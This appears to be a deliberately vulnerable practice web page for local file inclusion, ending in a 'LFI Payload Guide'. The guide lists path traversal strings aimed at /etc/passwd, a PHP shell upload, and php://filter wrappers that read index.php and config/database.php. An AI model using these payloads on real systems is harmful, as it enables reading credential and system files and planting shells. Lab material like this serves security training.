File Upload System

Upload documents and files to the system. PHP files will be automatically processed.

Configuration Loader

Load and view configuration files from the config directory.

Plugin Manager

Load and execute system plugins.

Cache System

View cached files and data.

Resource Loader

Load system resources and files using advanced methods.

LFI Payload Guide
File Upload Payloads:
malicious.php (upload PHP shell)
../../../etc/passwd (path traversal in filename)
Configuration Payloads:
../../../../etc/passwd
/etc/passwd
../upload_log.txt
Plugin Payloads:
../../../../etc/passwd
../uploads/malicious.php
/etc/hosts
Cache Payloads:
../../../../etc/passwd
../config/database.php
Resource Payloads (php://filter):
php://filter/convert.base64-encode/resource=index.php
php://filter/read=string.rot13/resource=config/database.php
php://filter/convert.base64-encode/resource=/etc/passwd